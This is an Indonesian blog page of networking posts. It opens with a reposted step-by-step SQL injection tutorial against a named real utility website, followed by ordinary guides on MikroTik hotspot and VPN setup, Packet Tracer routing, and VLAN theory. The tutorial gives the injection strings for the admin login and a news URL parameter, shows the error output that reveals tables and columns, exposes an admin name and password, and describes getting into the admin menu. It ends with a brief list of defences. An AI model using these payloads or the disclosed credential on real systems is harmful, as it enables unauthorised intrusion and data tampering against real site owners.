Showing posts with label Belajar JARKOM. Show all posts
Showing posts with label Belajar JARKOM. Show all posts

05 January 2011

SQL Injection

SQL Injection, step by step
By D-and
Published: April 25, 2007

/*********************************************************
 * SQL Injection, step by step.
 *
 * No Warranty. This tutorial is for educational use only,
 * commercial use is prohibited.
 *
 **********************************************************/

Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ?
Anda tahu betapa berbahaya bug yang satu ini ?
Berikut akan kita sajikan step by step SQL Injection ini.
Catatan : kita akan membatasi bahasan pada SQL Injection
di MS-SQL Server.

Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.

Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR

Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD

Lakukan langkah di atas sampai kita menemukan field terakhir.

Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !!   -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.

Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.

Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.

Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN--
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba

Atau kita pakai jalan pintas saja....

Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!

Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).

Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama.

Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan
pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.

Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.


******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user
di SQL Server Security tab.


Yah itulah mungkin yang dapat saya ceritakan.....
Hal itu adalah gambaran, betapa tidak amannya dunia internet...
Kalau mau lebih aman, copot kabel jaringan anda, copot disk
drive anda, copot harddisk anda, jual kompie anda !!!
Just kidding )


Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)

25 April 2010

Hotspot Server Setup

Hotspot Server Setup

Setting Ethernet yang konek ke jaringan Internet misal:

/ ip address add address=192.168.1.5/24 network=192.168.1.0 broadcast=192.168.1.255 interface=ether1

Konfigurasi untuk interface yang konek ke jaringan local.

/ ip address add address=10.10.0.1/24 network=10.10.0.0 broadcast=10.10.0.255 interface=ether2

Selanjutnya setting DNS nya kasih centang di "ALLOW REMOTE REQUEST" (konfigurasi ini melewatkan request dari client) sample :



Liat menu ROUTE dan langsung menuju TKP. Kilik tombol + . isikan ip gateway anda. Sample :



Lompat aja ke IP>Hotspot klik Hospot setup.

















19 February 2010

Setting Router RIP V.2 in Packet Tracer 5.0

[ SETTING JARINGAN ANTAR ROUTER RIP V.2 PADA PACKET TRACER 5.0 ]














1 . Click the link below to download the file ". Pkt" in the simulated image above:














2. Click the link below to download the file ". Pdf " in the simulated image above:
NB: pass Router nya : Cisco
apabila masuk ke dalam router menggunakan console, pass nya : console

untuk simulasi di atas

16 February 2010

Pengantar VLAN

Pengantar VLAN.

Kinerja sebuah jaringan sangat dibutuhkan oleh organisasi terutama dalam hal kecepatan dalam pengiriman data. Salah satu kontribusi teknologi untuk meningkatkan kinerja jaringan adalah dengan kemampuan untuk membagi sebuah broadcast domain yang besar menjadi beberapa broadcast domain yang lebih kecil dengan menggunakan VLAN. Broadcast domain yang lebih kecil akan membatasi device yang terlibat dalam aktivitas broadcast dan membagi device ke dalam beberapa grup berdasar fungsinya, se[erti layanan databasse untuk unit akuntansi, dan data transfer yang cepat untuk unit teknik.

Teknologi VLAN (Virtual Local Area Network) bekerja dengan cara melakukan pembagian network secara logika ke dalam beberapa subnet. VLAN adalah kelompok device dalam sebuah LAN yang dikonfigurasi (menggunakan software manajemen) sehingga mereka dapat saling berkomunikasi asalkan dihubungkan dengan jaringan yang sama walaupun secara fisikal mereka berada pada segmen LAN yang berbeda. Jadi VLAN dibuat bukan berdasarkan koneksi fisikal namun lebih pada koneksi logikal, yang tentunya lebih fleksibel. Secara logika, VLAN membagi jaringan ke dalam beberapa subnetwork. VLAN mengijinkan banyak subnet dalam jaringan yang menggunakan switch yang sama.

Dengan menggunakan VLAN, kita dapat melakukan segmentasi jaringan switch berbasis pada fungsi, departemen atau pun tim proyek. Kita dapat juga mengelola jaringan kita sejalan dengan kebutuhan pertumbuhan perusahaan sehingga para pekerja dapat mengakses segmen jaringan yang sama walaupun berada dalam lokasi


yang berbeda. Contoh penerapan teknologi VLAN diberikan dalam Gambar 1.

Gambar 1. Contoh penerapan teknologi VLAN.

Beberapa keuntungan penggunaan VLAN antara lain:

1. Security – keamanan data dari setiap divisi dapat dibuat tersendiri, karena segmennya bisa dipisah secarfa logika. Lalu lintas data dibatasi segmennya.

2. Cost reduction – penghematan dari penggunaan bandwidth yang ada dan dari upgrade perluasan network yang bisa jadi mahal.

3. Higher performance – pembagian jaringan layer 2 ke dalam beberapa kelompok broadcast domain yang lebih kecil, yang tentunya akan mengurangi lalu lintas packet yang tidak dibutuhkan dalam jaringan.

4. Broadcast storm mitigation – pembagian jaringan ke dalam VLAN-VLAN akan mengurangi banyaknya device yang berpartisipasi dalam pembuatan broadcast storm. Hal ini terjadinya karena adanya pembatasan broadcast domain.

5. Improved IT staff efficiency – VLAN memudahkan manajemen jaringan karena pengguna yang membutuhkan sumber daya yang dibutuhkan berbagi dalam segmen yang sama.

6. Simpler project or application management – VLAN menggabungkan para pengguna jaringan dan peralatan jaringan untuk mendukung perusahaan dan menangani permasalahan kondisi geografis.

Untuk memberi identitas sebuah VLAN digunakan nomor identitas VLAN yang dinamakan VLAN ID. Digunakan untuk menandai VLAN yang terkait. Dua range VLAN ID adalah:

a. Normal Range VLAN (1 – 1005)

- digunakan untuk jaringan skala kecil dan menengah.

- Nomor ID 1002 s.d. 1005 dicadangkan untuk Token Ring dan FDDI VLAN.

- ID 1, 1002 - 1005 secara default sudah ada dan tidak dapat dihilangkan.

- Konfigurasi disimpan di dalam file database VLAN, yaitu vlan.dat. file ini disimpan dalam memori flash milkik switch.

- VLAN trunking protocol (VTP), yang membantu manaejemn VLAN, nanti dipelajari di bab 4, hanya dapat bekerja pada normal range VLAN dan menyimpannya dalam file database VLAN.

b. Extended Range VLANs (1006 – 4094)

- memampukan para seervice provider untuk memperluas infrastrukturnya kepada konsumen yang lebih banyak. Dibutuhkan untuk perusahaan skala besar yang membutuhkan jumlah VLAN lebih dari normal.

- Memiliki fitur yang lebih sedikit dibandingakn VLAN normal range.

- Disimpan dalam NVRAM (file running configuration).

- VTP tidak bekerja di sini.

Switch catalys 2960 mendukung 255 normal range dan extended range.

Berikut ini diberikan beberapa terminologi di dalam VLAN.

a. VLAN Data

VLAN Data adalah VLAN yang dikonfigurasi hanya untuk membawa data-data yang digunakan oleh user. Dipisahkan dengan lalu lintas data suara atau pun manajemen switch. Seringkali disebut dengan VLAN pengguna, User VLAN.

b. VLAN Default

Semua port switch pada awalnya menjadi anggota VLAN Default. VLAN Default untuk Switch Cisco adalah VLAN 1. VLAN 1 tidak dapat diberi nama dan tidak dapat dihapus.

c. Native VLAN

Native VLAN dikeluarkan untuk port trunking 802.1Q. port trunking 802.1Q mendukung lalu lintas jaringan yang datang dari banyak VLAN (tagged traffic) sama baiknya dengan yang datang dari sebuah VLAN (untagged traffic). Port trunking 802.1Q menempatkan untagged traffic pada Native VLAN.

d. VLAN Manajemen

VLAN Manajemen adalah VLAN yang dikonfigurasi untuk memanajemen switch. VLAN 1 akan bekerja sebagai Management VLAN jika kita tidak mendefinisikan VLAN khusus sebagai VLAN Manajemen. Kita dapat memberi IP address dan subnet mask pada VLAN Manajemen, sehingga switch dapat dikelola melalui HTTP, Telnet, SSH, atau SNMP.

e. VLAN Voice

VLAN yang dapat mendukung Voice over IP (VoIP). VLAN yang dikhusukan untuk komunikasi data suara.

Terdapat 3 tipe VLAN dalam konfigurasi, yaitu:

a. Static VLAN – port switch dikonfigurasi secara manual.

Konfigurasi:

SwUtama#config Terminal

Enter configuration commands, one per line. End with CNTL/Z.

SwUtama(config)#VLAN 10

SwUtama(config-vlan)#name VLAN_Mahasiswa

SwUtama(config-vlan)#exit

SwUtama(config)#Interface fastEthernet 0/2

SwUtama(config-if)#switchport mode access

SwUtama(config-if)#switchport access VLAN 10

b. Dynamic VLAN – Mode ini digunakan secara luas di jaringan skala besar. Keanggotaan port Dynamic VLAN dibuat dengan menggunakan server khusu yang disebut VLAN Membership Policy Server (VMPS). Dengan menggunakan VMPS, kita dapat menandai port switch dengan VLAN? secara dinamis berdasar pada MAC Address sumber yang terhubung dengan port.

c. Voice VLAN - port dikonfigurasi dalam mode voice sehingga dapat mendukung IP phone yang terhubung.

Konfigurasi:

SwUtama(config)#VLAN 120

SwUtama(config-vlan)#name VLAN_Voice

SwUtama(config-vlan)#exit

SwUtama(config)#Interface fastEthernet 0/3

SwUtama(config-if)#switchport voice VLAN 120

Beberapa keuntungan penggunaan VLAN antara lain:

1. Security – keamanan data dari setiap divisi dapat dibuat tersendiri, karena segmennya bisa dipisah secarfa logika. Lalu lintas data dibatasi segmennya.

2. Cost reduction – penghematan dari penggunaan bandwidth yang ada dan dari upgrade perluasan network yang bisa jadi mahal.

3. Higher performance – pembagian jaringan layer 2 ke dalam beberapa kelompok broadcast domain yang lebih kecil, yang tentunya akan mengurangi lalu lintas packet yang tidak dibutuhkan dalam jaringan.

4. Broadcast storm mitigation – pembagian jaringan ke dalam VLAN-VLAN akan mengurangi banyaknya device yang berpartisipasi dalam pembuatan broadcast storm. Hal ini terjadinya karena adanya pembatasan broadcast domain.

5. Improved IT staff efficiency – VLAN memudahkan manajemen jaringan karena pengguna yang membutuhkan sumber daya yang dibutuhkan berbagi dalam segmen yang sama.

6. Simpler project or application management – VLAN menggabungkan para pengguna jaringan dan peralatan jaringan untuk mendukung perusahaan dan menangani permasalahan kondisi geografis.

Untuk memberi identitas sebuah VLAN digunakan nomor identitas VLAN yang dinamakan VLAN ID. Digunakan untuk menandai VLAN yang terkait. Dua range VLAN ID adalah:

a. Normal Range VLAN (1 – 1005)

- digunakan untuk jaringan skala kecil dan menengah.

- Nomor ID 1002 s.d. 1005 dicadangkan untuk Token Ring dan FDDI VLAN.

- ID 1, 1002 - 1005 secara default sudah ada dan tidak dapat dihilangkan.

- Konfigurasi disimpan di dalam file database VLAN, yaitu vlan.dat. file ini disimpan dalam memori flash milkik switch.

- VLAN trunking protocol (VTP), yang membantu manaejemn VLAN, nanti dipelajari di bab 4, hanya dapat bekerja pada normal range VLAN dan menyimpannya dalam file database VLAN.

b. Extended Range VLANs (1006 – 4094)

- memampukan para seervice provider untuk memperluas infrastrukturnya kepada konsumen yang lebih banyak. Dibutuhkan untuk perusahaan skala besar yang membutuhkan jumlah VLAN lebih dari normal.

- Memiliki fitur yang lebih sedikit dibandingakn VLAN normal range.

- Disimpan dalam NVRAM (file running configuration).

- VTP tidak bekerja di sini.

Switch catalys 2960 mendukung 255 normal range dan extended range.

Berikut ini diberikan beberapa terminologi di dalam VLAN.

a. VLAN Data

VLAN Data adalah VLAN yang dikonfigurasi hanya untuk membawa data-data yang digunakan oleh user. Dipisahkan dengan lalu lintas data suara atau pun manajemen switch. Seringkali disebut dengan VLAN pengguna, User VLAN.

b. VLAN Default

Semua port switch pada awalnya menjadi anggota VLAN Default. VLAN Default untuk Switch Cisco adalah VLAN 1. VLAN 1 tidak dapat diberi nama dan tidak dapat dihapus.

c. Native VLAN

Native VLAN dikeluarkan untuk port trunking 802.1Q. port trunking 802.1Q mendukung lalu lintas jaringan yang datang dari banyak VLAN (tagged traffic) sama baiknya dengan yang datang dari sebuah VLAN (untagged traffic). Port trunking 802.1Q menempatkan untagged traffic pada Native VLAN.

d. VLAN Manajemen

VLAN Manajemen adalah VLAN yang dikonfigurasi untuk memanajemen switch. VLAN 1 akan bekerja sebagai Management VLAN jika kita tidak mendefinisikan VLAN khusus sebagai VLAN Manajemen. Kita dapat memberi IP address dan subnet mask pada VLAN Manajemen, sehingga switch dapat dikelola melalui HTTP, Telnet, SSH, atau SNMP.

e. VLAN Voice

VLAN yang dapat mendukung Voice over IP (VoIP). VLAN yang dikhusukan untuk komunikasi data suara.

Terdapat 3 tipe VLAN dalam konfigurasi, yaitu:

a. Static VLAN – port switch dikonfigurasi secara manual.

Konfigurasi:

SwUtama#config Terminal

Enter configuration commands, one per line. End with CNTL/Z.

SwUtama(config)#VLAN 10

SwUtama(config-vlan)#name VLAN_Mahasiswa

SwUtama(config-vlan)#exit

SwUtama(config)#Interface fastEthernet 0/2

SwUtama(config-if)#switchport mode access

SwUtama(config-if)#switchport access VLAN 10

b. Dynamic VLAN – Mode ini digunakan secara luas di jaringan skala besar. Keanggotaan port Dynamic VLAN dibuat dengan menggunakan server khusu yang disebut VLAN Membership Policy Server (VMPS). Dengan menggunakan VMPS, kita dapat menandai port switch dengan VLAN? secara dinamis berdasar pada MAC Address sumber yang terhubung dengan port.

c. Voice VLAN - port dikonfigurasi dalam mode voice sehingga dapat mendukung IP phone yang terhubung.

Konfigurasi:

SwUtama(config)#VLAN 120

SwUtama(config-vlan)#name VLAN_Voice

SwUtama(config-vlan)#exit

SwUtama(config)#Interface fastEthernet 0/3

SwUtama(config-if)#switchport voice VLAN 120

Berikut ini diberikan sedikit command untuk konfigurasi dasar VLAN pada Swicth Cisco Catalyst

Untuk Langkah2 pembuatan sebuah VLAN,tunggu artikel saya yang akan datang :)



04 February 2010

Configure A Router With Packet Tracer

Computer networking professionals getting started with Packet Tracer may find the interface to be flustered. Being a development program, this is only natural. However, learning how to configure a router with Packet Tracer will put professionals on the right track to mastering the program in about half an hour.
By this time, you should already have the Packet Tracer download and have it installed on your computer. Open the program and select the router from the lower left-hand corner, and drag it into the center of the sandbox screen as seen below. (Click for larger picture)




We will be setting up a very basic network that allows two computers to communicate, so the next step is to select end devices from the bottom left-hand corner and drag it to the sandbox screen. Do this twice to make two computers appear below the router.
Now select connections from the same bottom left-hand corner. When you connect like-devices(Such as a router and computer) you use a crossover cable, so you should select copper cross-over cable from the second menu to the immediate right. Click on Router0, and connect the cable via FastEthernet0/0 as seen below:



Now click the PC0 and select FastEthernet. You will notice that although a link is established, it is not functional. You can tell by the red dots that are present on both ends of the connection. Once the router is configured correctly, the red dots will turn green to indicate the devices are able to communicate.
Do the same operation to PC1, only this time connect the cable to FastEthernet0/1 since FastEthernet0/0 is already taken by PC0. Your network should be similar to the one below at this point:



" Configuring The Router In Packet Tracer "
A router that is turned off doesn’t work very well! Click on your router to bring up the configuration menu and verify that it is turned on.When on, there will be a small green light below the switch as seen in the diagram.



Next we have to open the Ethernet ports to allow communication. Although they are physically connected, they are in a state that is known as being in administrative shut down. Now click on the CLI tab to access the configuration menu. If you’ve used the Cisco IOS before, you will notice it looks and acts the same way.
1. Press RETURN to start the session
2. Type enable to get to privileged mode (this gives you more options in configuring the router)
3. Type config terminal (or config t for short) to access the configuration menu.
4. Type interface fastethernet0/0 to access Ethernet0/0
5. Type ip address 192.168.10.1 255.255.255.0 to assign an IP address and subnet mask to the interface.
6. Type no shutdown to open the interface up for business.

That’s it! You should now see a message similar to the following:

%LINK-5-CHANGED: Interface FastEthernet0/0, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/0, changed state to up
Now we have to do the same thing for fastethernet0/1. If you don’t, there still won’t be a connection to PC1! Make sure to enter the IP address carefully as seen below:
1. Press Ctrl + Z to go back to the previous mode.
1. Type interface fastethernet0/1
2. Type ip address 192.168.20.1 255.255.255.0
3. Type no shutdown

At this point our router is configured properly. If you test out a ping, you will notice that the computers still don’t communicate, however!

" Configuring The Gateway In Packet Tracer "

Our last step is to configure the gateway on each desktop computer. The gateway is the address we assigned to the Ethernet port that the desktop is connected to. It will allow the computer to interface with another network, so our ping won’t work without it!
Click on PC0 to bring up the configuration menu. Under global settings you will find a field for the gateway. Enter the corresponding IP address of the router’s interface, which is 192.168.10.1.



Do the same thing for PC1, only use the 192.168.20.1 address. You can confirm that your network works by sending out a packet of information from PC0 to PC1, and vice versa. Click the packet icon on the right menu as seen below:



Click on PC0 and then click PC1. On the lower right of the screen you will see a message box that says “Successful.” If it doesn’t, you may have had a syntax error when putting in an IP address or router configuration command. Review your work or ask for help among the community if you are stuck.

rep : ccna4u

31 December 2009

Konfigurasi cara membuat VPN server di mikrotik

Bagi anda yang ingin membuat vpn server dengan menggunakan mikrotik router OS berikut ini konfigurasi cara membuat VPN Server di Mikrotik :

Login ke Mikrotik melalui utility Winbox kesayangan anda.

Klik Menu “PPP” => Point to Point Protocol.

Klik Tab “Interfaces” seperti gambar di samping.

Klik Menu Add “PPTP Server” => Point to Point Tuneling Protocol.

Berikan Nama untuk Interface baru ini, misalnya : vpnserver

Lalu berikan nama User, misalnya : vpnku

Lalu Klik Tab “Secret”, berikan name : vpnku

Checkmark Password, isikan : vpnku

Masukkan Local Address, misalnya : 172.16.25.50

Masukkan Remote Address, misalnya : 172.16.25.250

Selanjutnya Klik “PPTP Server”, Checkmark “Enable”.

Checkmark juga “MSCHAP1” dan “MSCHAP1”.

VPN Server sudah siap digunakan.

Selamat mencoba…

20 December 2009

Apa Itu VLan (Virtual Local Area Network)

Pemanfaatan teknologi jaringan komputer sebagai media komunikasi data hingga
saat ini semakin meningkat. Kebutuhan atas penggunaan bersama resources yang
ada dalam jaringan baik software maupun hardware telah mengakibatkan timbulnya
berbagai pengembangan teknologi jaringan itu sendiri. Seiring dengan semakin
tingginya tingkat kebutuhan dan semakin banyaknya pengguna jaringan yang
menginginkan suatu bentuk jaringan yang dapat memberikan hasil maksimal baik
dari segi efisiensi maupun peningkatan keamanan jaringan itu sendiri.
Berlandaskan pada keinginan-keinginan tersebut, maka upaya-upaya penyempurnaan
terus dilakukan oleh berbagai pihak. Dengan memanfaatkan berbagai tekhnik
khususnya teknik subnetting dan penggunaan hardware yang lebih baik
(antara lain switch) maka muncullah konsep Virtual Local Area Network (VLAN)
yang diharapkan dapat memberikan hasil yang lebih baik dibanding
Local area Network (LAN).

PENGERTIAN

VLAN merupakan suatu model jaringan yang tidak terbatas pada lokasi fisik
seperti LAN , hal ini mengakibatkan suatu network dapat dikonfigurasi secara
virtual tanpa harus menuruti lokasi fisik peralatan. Penggunaan VLAN akan
membuat pengaturan jaringan menjadi sangat fleksibel dimana dapat dibuat
segmen yang bergantung pada organisasi atau departemen, tanpa bergantung pada
lokasi workstation seperti pada gambar dibawah ini :

Gambar Jaringan VLAN



















BAGAIMANA VLAN BEKERJA

VLAN diklasifikasikan berdasarkan metode (tipe) yang digunakan untuk
mengklasifikasikannya, baik menggunakan port, MAC addresses dsb. Semua
informasi yang mengandung penandaan/pengalamatan suatu vlan (tagging)
di simpan dalam suatu database (tabel), jika penandaannya berdasarkan
port yang digunakan maka database harus mengindikasikan port-port yang
digunakan oleh VLAN. Untuk mengaturnya maka biasanya digunakan
switch/bridge yang manageable atau yang bisa di atur. Switch/bridge
inilah yang bertanggung jawab menyimpan semua informasi dan konfigurasi
suatu VLAN dan dipastikan semua switch/bridge memiliki informasi yang sama.
Switch akan menentukan kemana data-data akan diteruskan dan sebagainya.
atau dapat pula digunakan suatu software pengalamatan (bridging software)
yang berfungsi mencatat/menandai suatu VLAN beserta workstation yang
didalamnya.untuk menghubungkan antar VLAN dibutuhkan router.

TIPE TIPE VLAN

Keanggotaan dalam suatu VLAN dapat di klasifikasikan berdasarkan port
yang di gunakan , MAC address, tipe protokol.

1. Berdasarkan Port

Keanggotaan pada suatu VLAN dapat di dasarkan pada port yang di gunakan oleh
VLAN tersebut. Sebagai contoh, pada bridge/switch dengan 4 port, port 1, 2,
dan 4 merupakan VLAN 1 sedang port 3 dimiliki oleh VLAN 2, lihat tabel:

Tabel port dan VLAN

Port 1 2 3 4
VLAN 2 2 1 2

Kelemahannya adalah user tidak bisa untuk berpindah pindah, apabila harus
berpindah maka Network administrator harus mengkonfigurasikan ulang.

2. Berdasarkan MAC Address

Keanggotaan suatu VLAN didasarkan pada MAC address dari setiap workstation
/komputer yang dimiliki oleh user. Switch mendeteksi/mencatat semua MAC
address yang dimiliki oleh setiap Virtual LAN. MAC address merupakan suatu
bagian yang dimiliki oleh NIC (Network Interface Card) di setiap workstation.
Kelebihannya apabila user berpindah pindah maka dia akan tetap terkonfigurasi
sebagai anggota dari VLAN tersebut.Sedangkan kekurangannya bahwa setiap mesin
harus di konfigurasikan secara manual , dan untuk jaringan yang memiliki
ratusan workstation maka tipe ini kurang efissien untuk dilakukan.

Tabel MAC address dan VLAN

MAC address 132516617738 272389579355 536666337777 24444125556
VLAN 1 2 2 1

3. Berdasarkan tipe protokol yang digunakan
Keanggotaan VLAN juga bisa berdasarkan protocol yang digunakan, lihat tabel

Tabel Protokol dan VLAN

Protokol IP IPX
VLAN 1 2

4. Berdasarkan Alamat Subnet IP
Subnet IP address pada suatu jaringan juga dapat digunakan untuk mengklasifikasi
suatu VLAN

Tabel IP Subnet dan VLAN

IP subnet 22.3.24 46.20.45
VLAN 1 2

Konfigurasi ini tidak berhubungan dengan routing pada jaringan dan juga tidak
mempermasalahkan funggsi router.IP address digunakan untuk memetakan keanggotaan
VLAN.Keuntungannya seorang user tidak perlu mengkonfigurasikan ulang alamatnya
di jaringan apabila berpindah tempat, hanya saja karena bekerja di layer yang lebih
tinggi maka akan sedikit lebih lambat untuk meneruskan paket di banding
menggunakan MAC addresses.

5. Berdasarkan aplikasi atau kombinasi lain
Sangat dimungkinkan untuk menentukan suatu VLAN berdasarkan aplikasi yang
dijalankan, atau kombinasi dari semua tipe di atas untuk diterapkan pada suatu
jaringan. Misalkan: aplikasi FTP (file transfer protocol) hanya bias digunakan
oleh VLAN 1 dan Telnet hanya bisa digunakan pada VLAN 2.

PERBEDAAN MENDASAR ANTARA LAN DAN VLAN

Perbedaan yang sangat jelas dari model jaringan Local Area Network dengan
Virtual Local Area Network adalah bahwa bentuk jaringan dengan model Local
Area Network sangat bergantung pada letak/fisik dari workstation, serta
penggunaan hub dan repeater sebagai perangkat jaringan yang memiliki beberapa
kelemahan. Sedangkan yang menjadi salah satu kelebihan dari model jaringan
